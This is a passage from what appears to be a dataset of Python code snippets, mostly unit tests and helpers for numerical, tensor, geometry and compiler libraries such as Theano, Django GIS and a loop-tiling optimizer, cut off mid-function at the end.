logger.info('shapes rows: %s cols: %s weight: %s' % (str(rows.shape), str(cols.shape), str(arr.shape)))\n img = img_from_pixel_arrays(rows,cols,W=arr)\n\n axim = gg.plotImageLarge(img,amp_range=amp_range)\n gg.move(500,10)\n gg.show()", "def test_sum_pos_5() -> None:\n # Fourth step, 5th square.\n assert nth(sw.sum_walk(), 3) == 5", "def test_ex_2_5(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n program_reg_allocation = RegisterAllocation()\n program_instrs = compiler.compile_program(program, program_reg_allocation)\n\n wam = WAM()\n wam.execute(query_instrs)\n wam.execute(program_instrs)\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_simple_2d(self):\r\n a = tt.dmatrix()\r\n increment = tt.dscalar()\r\n sl1 = slice(None)\r\n sl2_end = tt.lscalar()\r\n sl2 = slice(sl2_end)\r\n\r\n for do_set in [False, True]:\r\n\r\n if do_set:\r\n resut = tt.set_subtensor(a[sl1, sl2], increment)\r\n else:\r\n resut = tt.inc_subtensor(a[sl1, sl2], increment)\r\n\r\n f = theano.function([a, increment, sl2_end], resut)\r\n\r\n val_a = numpy.ones((5, 5))\r\n val_inc = 2.3\r\n val_sl2_end = 2\r\n\r\n result = f(val_a, val_inc, val_sl2_end)\r\n\r\n 
expected_result = numpy.copy(val_a)\r\n if do_set:\r\n expected_result[:, :val_sl2_end] = val_inc\r\n else:\r\n expected_result[:, :val_sl2_end] += val_inc\r\n\r\n utt.assert_allclose(result, expected_result)", "def test_expr(self):\n self.common_test_expr(True)", "def test_elemwise_multiple_inputs_optimisation(self):\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype=\r\n 'float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n# (fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx+dy+dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (dx*dy*dz,(dx,dy,dz),(dxv,dyv,dzv),1,'float64'),\r\n# (fx*fy*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (dx*dy*(dx+dy+dz),(dx,dy,dz),(dxv,dyv,dzv),2,'float64'),\r\n# (fx*fy*(fx+fy+dz),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type add\r\n# (dz*fy*(fx+fy),(fx,fy,dz),(dxv,dyv,dzv),2,'float64'),#check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {'custom':\r\n 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (2+fx+fy+fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n# (2*fx*fy*fz,(fx,fy,fz),(fxv,fyv,fzv),1,'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n# (fx*fy*2*(fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n# (fx*fy*(2+fx+fy+fz),(fx,fy,fz),(fxv,fyv,fzv),2,'float32'),\r\n (fx * fy * 2 * (fx + fy + fz+2), (fx, fy, fz), (fxv, fyv, fzv), 2, {\r\n 'custom': 'float32', 'numpy+floatX': config.floatX, 'numpy': 'float64'}),\r\n\r\n #check with broadcast of row\r\n# (fx+fy+fz+fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fz*fv,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv+fx+fy+fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fv*fx*fy*fz,(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),1,'float32'),\r\n# (fx*fy*fv*(fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (fx*fy*fv*(fv+fx+fy+fz),(fx,fy,fz,fv),(fxv,fyv,fzv,fvv),2,'float32'),\r\n# (dx+dy+dz+dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dz*dv,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv+dx+dy+dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dv*dx*dy*dz,(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),1,'float64'),\r\n# (dx*dy*dv*(dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# 
(dx*dy*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n# (dx*dy*dv*(dv+dx+dy+dz),(dx,dy,dz,dv),(dxv,dyv,dzv,dvv),2,'float64'),\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n old_optimizer = mode._optimizer\r\n try:\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding(\r\n 'local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n if isinstance(out_dtype, dict):\r\n out_dtype = out_dtype[config.cast_policy]\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)\r\n finally:\r\n mode._optimizer = old_optimizer", "def test_inside(self):\n\n World.reset()\n\n\n def inside(x, y):\n centers_distance = tf.sqrt(tf.reduce_sum(tf.squared_difference(x[:, 0:2], y[:, 0:2]), axis=1) + 1e-6)\n return tf.cast((centers_distance + x[:, 2]) < y[:, 2], tf.float32)\n\n circles = tfl.Domain(label=\"Circles\", data=[[0., 0, 1], [0,0, 2], [0,0, 3]])\n inside = tfl.Predicate(label=\"inside\", domains=[\"Circles\", \"Circles\"], function=inside)\n tfl.setTNorm(id=tfl.SS, p=1)\n sess = tf.Session()\n\n\n # Constraint 1\n \"zero(x) and one(y)\"\n x = tfl.variable(circles, name=\"x\")\n y = tfl.variable(circles, name=\"y\")\n z = tfl.variable(circles, name=\"z\")\n a = tfl.atom(inside, (x,y))\n b = tfl.atom(inside, (y,z))\n c = tfl.atom(inside, (x,z))\n andd = tfl.and_n(a, b)\n\n rule = tfl.implies(andd,c)\n\n assert np.equal(sess.run(rule), np.zeros(shape=[3,3,3])).all()\n assert len(World._predicates_cache)==1", "def test_operators_functions_unavailable_for_geography(self):\n z = Zipcode.objects.get(code=\"77002\")\n point_field = \"%s.%s::geometry\" % (\n connection.ops.quote_name(City._meta.db_table),\n connection.ops.quote_name(\"point\"),\n )\n # ST_Within.\n qs = City.objects.filter(point__within=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"ST_Within({point_field}\", ctx.captured_queries[0][\"sql\"])\n # @ operator.\n qs = City.objects.filter(point__contained=z.poly)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} @\", ctx.captured_queries[0][\"sql\"])\n # ~= operator.\n htown = City.objects.get(name=\"Houston\")\n qs = City.objects.filter(point__exact=htown.point)\n with CaptureQueriesContext(connection) as ctx:\n self.assertEqual(qs.count(), 1)\n self.assertIn(f\"{point_field} ~=\", ctx.captured_queries[0][\"sql\"])", "def test_flat(self, expr, result, mode):\n i, j = dimify('i j')\n a = symbol(name='a', dimensions=(i, j), value=2., mode=mode)\n b = symbol(name='b', dimensions=(i, j), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_data_along(self):\n ex = self.ex\n m = self.m\n n = self.n\n\n nreps = random.randint(1, 10)\n ex.nreps = nreps\n ex.vary[\"X\"][\"with\"].add(\"rep\")\n ex.vary[\"X\"][\"along\"] = 1\n ex.infer_lds()\n\n cmds = ex.generate_cmds()\n\n self.assertIn([\"smalloc\", \"X\", nreps * m * n], 
cmds)\n repidx = random.randint(0, nreps - 1)\n self.assertIn([\"soffset\", \"X\", repidx * m * n, \"X_%d\" % repidx], cmds)", "def ifind_at(self, x, y):\n for sym in self.itersymbols():\n bx0,by0,bx1,by1 = sym.sym.bbox()\n if bx0 <= x <= bx1 and by0 <= y <= by1:\n yield sym.sym", "def test_compute_pixel_ray_directions_vectorized() -> None:\n fx = 10\n fy = 10\n\n # dummy 2d coordinates in the image plane.\n uv: NDArrayInt = np.array([[12, 2], [12, 2], [12, 2], [12, 2]])\n\n # principal point is at (10,5)\n img_w = 20\n img_h = 10\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n gt_ray_dir: NDArrayFloat = np.array([2, -3, 10.0])\n gt_ray_dir /= np.linalg.norm(gt_ray_dir)\n\n for i in range(4):\n assert np.allclose(gt_ray_dir, ray_dirs[i])", "def p2p_xyz(start_point, end_point, top_left_cor, cellsize, dem):\n start_cell = (int((start_point[0] - top_left_cor[0]) / cellsize[0]),\n int((start_point[1] - top_left_cor[1]) / cellsize[1]))\n end_cell = (int((end_point[0] - top_left_cor[0]) / cellsize[0]),\n int((end_point[1] - top_left_cor[1]) / cellsize[1]))\n cells = misc.get_line(start_cell, end_cell) \n pnts = []\n elev = []\n \n dem_elv = dem[:,1]\n dem_indx = dem[:,2:4]\n\n for cell in cells:\n x = top_left_cor[0] + cell[0] * cellsize[0] + cellsize[0] / 2\n y = top_left_cor[1] + cell[1] * cellsize[1] + cellsize[1] / 2\n #xy_indx=[str(cell[0]),str(cell[1])]\n z_indx=np.logical_and(np.equal(dem_indx[:,0],cell[0]),np.equal(dem_indx[:,1],cell[1]))\n try:\n z=dem_elv[z_indx][0]\n except (np.sum(z_indx)>1):\n print(\"Oops! That was more than one indices in dem matching the query index (in getCellValue)\")\n #z_indx = [i for i,j in enumerate(dem_indx) if j == xy_indx]\n z = float(dem_elv[z_indx])\n pnts.append((x, y))\n elev.append(z)\n return pnts, elev", "def test_verify():\n Lx = 10; Ly = 10; c = 1.0\n\n def I(x, y):\n return exp(-pow(x-Lx/2.0,2)/2.0 -pow(y-Ly/2.0,2)/2.0)\n def f(x, y, t):\n return sin(2*x) + y\n def bc(x, y, t):\n return sin(t)\n\n # use string formulas instead so also weave can be tested:\n # (need to transfer globals() so that vectorized versions work)\n I = StringFunction('exp(-pow(x-Lx/2.0,2)/2.0 - pow(y-Ly/2.0,2)/2.0)',\n independent_variables=('x', 'y'),\n Lx=Lx, Ly=Ly, globals=globals())\n f = StringFunction('sin(2*x) + y',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n bc = StringFunction('sin(t)',\n independent_variables=('x', 'y', 't'),\n globals=globals())\n\n #nx = 15; ny = 10; tstop = 2\n nx = 4; ny = 3; tstop = 16\n verify_implementations(I, f, c, bc, Lx, Ly, nx, ny, tstop)", "def test_compute_pixel_ray_directions_vectorized_entireimage() -> None:\n fx = 10\n fy = 10\n\n img_w = 100\n img_h = 50\n\n pinhole_camera = _create_pinhole_camera(\n fx_px=fx,\n fy_px=fy,\n cx_px=img_w / 2,\n cy_px=img_h / 2,\n height_px=img_h,\n width_px=img_w,\n cam_name=\"ring_front_center\", # dummy name\n )\n\n uv_list = []\n for u in range(img_w):\n for v in range(img_h):\n uv_list += [(u, v)]\n\n uv: NDArrayInt = np.array(uv_list)\n assert uv.shape == (img_w * img_h, 2)\n\n ray_dirs = pinhole_camera.compute_pixel_ray_directions(uv)\n\n # compare w/ vectorized, should be identical\n for i, ray_dir_vec in enumerate(ray_dirs):\n u, v = uv[i]\n ray_dir_nonvec = _compute_pixel_ray_direction(u, v, fx, fy, img_w, img_h)\n assert np.allclose(ray_dir_vec, 
ray_dir_nonvec)", "def __staticLoopBoundScanning(\n self, stmts, tile_level, outer_loop_inames, loop_info_table\n ):\n\n # initialize all returned variables\n scan_stmts = []\n lbound_info_seq = []\n int_vars = []\n\n # generate the lower and upper values of each inter-tile loop\n val_table = {}\n for iname in outer_loop_inames:\n _, _, _, st_exp, _ = loop_info_table[iname]\n lval = ast.IdentExp(self.__getTileIterName(iname, tile_level))\n t = ast.BinOpExp(\n ast.IdentExp(self.__getTileSizeName(iname, tile_level)),\n ast.ParenthExp(st_exp.replicate()),\n ast.BinOpExp.SUB,\n )\n uval = ast.BinOpExp(lval.replicate(), ast.ParenthExp(t), ast.BinOpExp.ADD)\n val_table[iname] = (lval, uval)\n\n # iterate over each statement to determine loop bounds that are affine functions\n # of outer loop iterators\n lb_exps_table = {}\n ub_exps_table = {}\n for stmt in stmts:\n\n # skip all non loop statements\n if not isinstance(stmt, ast.ForStmt):\n lbound_info_seq.append(None)\n continue\n\n # extract this loop structure\n id, lb_exp, ub_exp, st_exp, lbody = self.ast_util.getForLoopInfo(stmt)\n\n # see if the loop bound expressions are bound/free of outer loop iterators\n lb_inames = filter(\n lambda i: self.ast_util.containIdentName(lb_exp, i), outer_loop_inames\n )\n ub_inames = filter(\n lambda i: self.ast_util.containIdentName(ub_exp, i), outer_loop_inames\n )\n\n # skip loops with bound expressions that are free of outer loop iterators\n if not lb_inames and not ub_inames:\n lbound_info_seq.append(None)\n continue\n\n # check if this loop runs only once\n is_one_time_loop = str(lb_exp) == str(ub_exp)\n\n # generate booleans to indicate the needs of prolog, epilog, and orio.main.tiled loop\n if is_one_time_loop:\n need_tiled_loop = False\n need_prolog = False\n need_epilog = False\n else:\n need_tiled_loop = True\n need_prolog = len(lb_inames) > 0\n need_epilog = len(ub_inames) > 0\n\n # generate new variable names for both the new lower and upper loop bounds\n if need_tiled_loop:\n lb_name, ub_name = self.__getLoopBoundNames()\n int_vars.extend([lb_name, ub_name])\n else:\n lb_name = \"\"\n ub_name = \"\"\n\n # append information about the new loop bounds\n lbinfo = (lb_name, ub_name, need_prolog, need_epilog, need_tiled_loop)\n lbound_info_seq.append(lbinfo)\n\n # skip generating loop-bound scanning code (if it's a one-time loop)\n if not need_tiled_loop:\n continue\n\n # determine the value of the new lower loop bound\n if str(lb_exp) in lb_exps_table:\n lb_var = lb_exps_table[str(lb_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n if need_prolog:\n t = self.__findMinMaxVal(\n \"max\", lb_exp.replicate(), lb_inames, val_table\n )\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), t.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n a = ast.BinOpExp(\n ast.IdentExp(lb_name), lb_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n lb_exps_table[str(lb_exp)] = ast.IdentExp(lb_name)\n scan_stmts.append(ast.ExpStmt(a))\n\n # determine the value of the new upper loop bound\n if str(ub_exp) in ub_exps_table:\n ub_var = ub_exps_table[str(ub_exp)]\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_var.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n if need_epilog:\n t = self.__findMinMaxVal(\n \"min\", ub_exp.replicate(), ub_inames, val_table\n )\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), t.replicate(), ast.BinOpExp.EQ_ASGN\n )\n else:\n a = ast.BinOpExp(\n ast.IdentExp(ub_name), ub_exp.replicate(), ast.BinOpExp.EQ_ASGN\n )\n ub_exps_table[str(ub_exp)] = 
ast.IdentExp(ub_name)\n scan_stmts.append(ast.ExpStmt(a))\n\n # return all necessary information\n return (scan_stmts, lbound_info_seq, int_vars)", "def test_G_ind(self):\r\n a = array([[29, 11], [273, 191], [8, 31], [64, 64]])\r\n self.assertFloatEqual(G_ind(a)[0], 28.59642)\r\n self.assertFloatEqual(G_ind(a, True)[0], 28.31244)", "def test_arithmetic(self):\n structure_memoizer = {\n defaults.DENOMINATOR_LOWER_BOUND_KEY: 0.0,\n defaults.GLOBAL_STEP_KEY: tf.compat.v2.Variable(0, dtype=tf.int32)\n }\n\n def constant_expression(penalty_constant, constraint_constant=None):\n penalty_basic_expression = basic_expression.BasicExpression(\n [term.TensorTerm(tf.constant(penalty_constant, dtype=tf.float32))])\n if constraint_constant is None:\n constraint_basic_expression = penalty_basic_expression\n else:\n constraint_basic_expression = basic_expression.BasicExpression([\n term.TensorTerm(tf.constant(constraint_constant, dtype=tf.float32))\n ])\n return expression.ExplicitExpression(penalty_basic_expression,\n constraint_basic_expression)\n\n # This expression exercises all of the operators.\n expression_object = (\n constant_expression(0.3) - (constant_expression(-3.6, -0.2) / 2.3 +\n 0.7 * constant_expression(1.5, -0.5)) -\n (constant_expression(1.2) + constant_expression(0.4, 2.3) -\n constant_expression(0.1)) * 0.6 + constant_expression(0.8))\n\n actual_penalty_value = expression_object.penalty_expression.evaluate(\n structure_memoizer)\n actual_constraint_value = expression_object.constraint_expression.evaluate(\n structure_memoizer)\n\n # We need to explicitly create the variables before creating the wrapped\n # session.\n variables = deferred_tensor.DeferredVariableList(\n actual_penalty_value.variables + actual_constraint_value.variables)\n for variable in variables:\n variable.create(structure_memoizer)\n\n # This is the same expression as above, applied directly to the python\n # floats.\n expected_penalty_value = (0.3 - (-3.6 / 2.3 + 0.7 * 1.5) -\n (1.2 + 0.4 - 0.1) * 0.6 + 0.8)\n expected_constraint_value = (0.3 - (-0.2 / 2.3 + 0.7 * -0.5) -\n (1.2 + 2.3 - 0.1) * 0.6 + 0.8)\n\n with self.wrapped_session() as session:\n self.assertNear(\n expected_penalty_value,\n session.run(actual_penalty_value(structure_memoizer)),\n err=1e-6)\n self.assertNear(\n expected_constraint_value,\n session.run(actual_constraint_value(structure_memoizer)),\n err=1e-6)", "def loc_eval(x, b):\r\n loc_est = 0\r\n for i in enumerate(b): loc_est+=i[1]*(x**i[0])\r\n return(loc_est)", "def test_bit_and_offset_out_of_range(self):\n value = bytearray()\n value.append(0)\n ops = [bitwise_operations.bit_and(self.five_255_bin, 41, 8, 1, value, None)]\n\n with pytest.raises(e.OpNotApplicable):\n self.as_connection.operate(self.test_key, ops)", "def _in_range_op(spec):", "def run_2dtest(dim=3):\n\n traces = []\n\n for smoothing in range(10, 101, 10):\n pencilbeams = []\n num_sight_lines = 100\n\n # Construct our pencilbeams\n xlin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n ylin = np.linspace(0., 1., num_sight_lines+1) * smoothing\n X,Y = np.meshgrid(xlin, ylin)\n\n # Store resulting LoS integrations in results\n results = X\n for i in range(0,num_sight_lines+1):\n for j in range(0,num_sight_lines+1): \n results[i,j] = testsph(X[i,j],Y[i,j],smoothing,dim=dim)\n\n # Integrate the pencilbeam weightings to find the full SPH weighting\n # This is the plane x-z from origin along +ve x-axis (sitting at y=0)\n\n # Have to integrate across x for every y\n Int_step = np.zeros( num_sight_lines+1 )\n for iy in range(0, 
num_sight_lines+1):\n isfin = np.isfinite(results[iy,:])\n Int_step[iy] = integrate.trapz(results[iy,isfin], xlin[isfin])\n # Now integrate across y\n isfin = np.isfinite(Int_step)\n particle_integral = integrate.trapz(Int_step[isfin], ylin[isfin])\n # \"All smoothing lengths should integrate to the same value of unity \"\n # We've sampled a quadrant in x-y and integrated entirely along z, so mulitply by 4\n print particle_integral * 4.\n\n isfin = np.isfinite(results[0,:])\n traces.append(go.Scatter(y=results[0,isfin], x=xlin[isfin]))\n\n # The integral of the entire particle should be unity, the trace of axis will not be however\n plot(traces)", "def test_coord_preceding_fs(self):", "def _set_bounds(b, x, n):\n for j in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, j, 0, n)] = -x[index_of(i, j, 1, n)] if b == 3 else x[index_of(i, j, 1, n)]\n x[index_of(i, j, 0, n - 1)] = -x[index_of(i, j, 1, n - 2)] if b == 3 else x[index_of(i, j, 1, n - 2)]\n for k in range(1, n - 1):\n for i in range(1, n - 1):\n x[index_of(i, 0, k, n)] = -x[index_of(i, 1, k, n)] if b == 2 else x[index_of(i, 1, k, n)]\n x[index_of(i, n - 1, 0, n - 1)] = -x[index_of(i, n - 2, k, n - 2)] if b == 2 else x[\n index_of(i, n - 2, k, n - 2)]\n for k in range(1, n - 1):\n for j in range(1, n - 1):\n x[index_of(0, j, k, n)] = -x[index_of(1, j, k, n)] if b == 1 else x[index_of(1, j, k, n)]\n x[index_of(n - 1, j, k, n - 1)] = -x[index_of(n - 2, j, k, n)] if b == 1 else x[\n index_of(n - 2, j, k, n)]\n\n x[index_of(0, 0, 0, n)] = 1 / 3 * (x[index_of(1, 0, 0, n)] + x[index_of(0, 1, 0, n)] + x[index_of(0, 0, 1, n)])\n x[index_of(0, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(1, n - 1, 0, n)] + x[index_of(0, n - 2, 0, n)] + x[index_of(0, n - 1, 1, n)])\n x[index_of(0, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(1, 0, n - 1, n)] + x[index_of(0, 1, n - 1, n)] + x[index_of(0, 0, n - 2, n)])\n x[index_of(0, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(1, n - 1, n - 1, n)] + x[index_of(0, n - 2, n - 1, n)] + x[index_of(0, n - 1, n - 2, n)])\n x[index_of(n - 1, 0, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, 0, n)] + x[index_of(n - 1, 1, 0, n)] + x[index_of(n - 1, 0, 1, n)])\n x[index_of(n - 1, n - 1, 0, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, 0, n)] + x[index_of(n - 1, n - 2, 0, n)] + x[index_of(n - 1, n - 1, 1, n)])\n x[index_of(n - 1, 0, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, 0, n - 1, n)] + x[index_of(n - 1, 1, n - 1, n)] + x[index_of(n - 1, 0, n - 2, n)])\n x[index_of(n - 1, n - 1, n - 1, n)] = 1 / 3 * (\n x[index_of(n - 2, n - 1, n - 1, n)] + x[index_of(n - 1, n - 2, n - 1, n)] + x[\n index_of(n - 1, n - 1, n - 2, n)])", "def test_non_sparse():\n A, b, c = ex3()\n interior(A, b, c)", "def _trace_dense(op): # pragma: no cover\n x = 0.0\n for i in range(op.shape[0]):\n x += op[i, i]\n return x", "def test(p):\n while p.quadrant() != TOP_RIGHT_QUAD:\n if p.x < 0:\n p = p.reflect_y()\n else:\n p = p.reflect_x()\n return p", "def test_handling_of_variable_bound_sums_in_trivial_summation(free_alg):\n\n dr = free_alg\n p = dr.names\n\n v = p.v\n r = p.R\n i = p.i\n alpha = p.alpha\n s = p.S\n n = Symbol('N')\n\n first = dr.sum((i, r[0, n]), (alpha, s[0, n]), v[alpha])\n\n # First trial, when the dummy is not actually used.\n assert dr.simplify(\n first\n ) == dr.sum((alpha, s[0, n]), n * v[alpha])\n\n # When i is used in the bounds of summation over alpha, it should be kept.\n second = dr.sum((i, r[0, n]), (alpha, s[0, i]), v[alpha])\n assert dr.simplify(\n second\n ) == second", "def test08(self):\n a = np.arange(1, 11)\n b = 
bcolz.carray(a)\n ul = [v for v in a if v <= 5]\n u = b.where(a <= 5)\n wl = [v for v in a if v <= 6]\n w = b.where(a <= 6)\n self.assertEqual(ul, list(u))\n self.assertEqual(wl, list(w))", "def evaluate(bounds , func):\n if len(bounds) != 2:\n raise ValueError(\"Bounds should contain 2 elements, found %d.\" % len(bounds))\n\n a = bounds[0]\n b = bounds[1]\n ya = func(a)\n yb = func((a+b)/2.)\n yc = func(b)\n I = (b-a) * (ya + 4. * yb + yc) / 6.\n return I", "def inSquare(x, y, xmci, ymci, ell, w) :\n ind = np.array([], int)\n \n for j in range(len(x)) :\n if (np.abs(x[j] - xmci) <= w) and (np.abs(y[j] - ymci) <= ell) :\n ind = np.hstack((ind, j))\n \n return ind", "def test_elemwise_composite_support_code():\r\n X = tcn.shared_constructor(value=numpy.zeros((100, 10), dtype=\"float32\"),\r\n name='X')\r\n W = tcn.shared_constructor(value=numpy.zeros((10, 1), dtype=\"float32\"),\r\n name='W')\r\n U = T.dot(X, W)\r\n Y = tcn.shared_constructor(value=numpy.zeros((100, 1), dtype=\"float32\"),\r\n name='Y')\r\n P = T.exp(-(Y - U) ** 2)\r\n epsilon = numpy.asarray(0.001, dtype=\"float32\")\r\n NLL = -T.mean(T.log(P + epsilon)) # SupportCodeError\r\n G = theano.gradient.grad(NLL, wrt=[W])\r\n\r\n backup = theano.config.warn.identify_1pexp_bug\r\n theano.config.warn.identify_1pexp_bug = False\r\n try:\r\n f_grad = theano.function(inputs=[], outputs=G, mode=mode_with_gpu)\r\n finally:\r\n theano.config.warn.identify_1pexp_bug = backup\r\n f_grad()\r\n\r\n topo = f_grad.maker.fgraph.toposort()\r\n assert sum([isinstance(node.op, T.Elemwise) for node in topo]) == 1\r\n #I suspect this was failing in the original branch too\r\n assert sum([isinstance(node.op, tcn.GpuElemwise) for node in topo]) == 1", "def test_nofission_as_illegal():\n grid = Grid(shape=(20, 20))\n x, y = grid.dimensions\n\n f = Function(name='f', grid=grid, dimensions=(y,), shape=(20,))\n u = TimeFunction(name='u', grid=grid)\n v = TimeFunction(name='v', grid=grid)\n\n eqns = [Inc(f, v + 1.),\n Eq(u.forward, f[y + 1] + 1.)]\n\n op = Operator(eqns, opt='fission')\n\n assert_structure(op, ['t,x,y', 't,x,y'], 't,x,y,y')", "def test_endpoint_slope(b,c,d,x_n_minus_1,x_n,expected_slope):\n\tactual_slope = b + 2*c*(x_n-x_n_minus_1) + 3*d*(x_n-x_n_minus_1)**2\n\tresult = abs(actual_slope-expected_slope)<0.001\n\treturn(result)", "def test_special_PSX(self, angexp):\n a, b, c = angexp[0]\n tgt = U3Gate(a, b, c).to_matrix()\n exp = {(\"p\", \"sx\")[g]: angexp[1][g] for g in (0, 1) if angexp[1][g]}\n self.check_oneq_special_cases(tgt, \"PSX\", exp)", "def expr(self):\n\n args = []\n for i in self.indices:\n args.extend((i.j, i.m))\n return Wigner3j(*args)", "def __getLoopBoundScanningStmts(\n self, stmts, tile_level, outer_loop_inames, loop_info_table\n ):\n\n # (optimization) generate code that determines the loop bounds of full tiles at compile time\n if self.affine_lbound_exps:\n return self.__staticLoopBoundScanning(\n stmts, tile_level, outer_loop_inames, loop_info_table\n )\n\n # initialize all returned variables\n scan_stmts = []\n lbound_info_seq = []\n int_vars = []\n\n # iterate over each statement to find loop bounds that are functions of outer loop iterators\n min_int = ast.NumLitExp(-2147483648, ast.NumLitExp.INT)\n max_int = ast.NumLitExp(2147483647, ast.NumLitExp.INT)\n lb_exps_table = {}\n ub_exps_table = {}\n pre_scan_stmts = []\n post_scan_stmts = []\n scan_loops = SimpleLoops()\n for stmt in stmts:\n\n # skip all non loop statements\n if not isinstance(stmt, ast.ForStmt):\n lbound_info_seq.append(None)\n continue\n\n # 
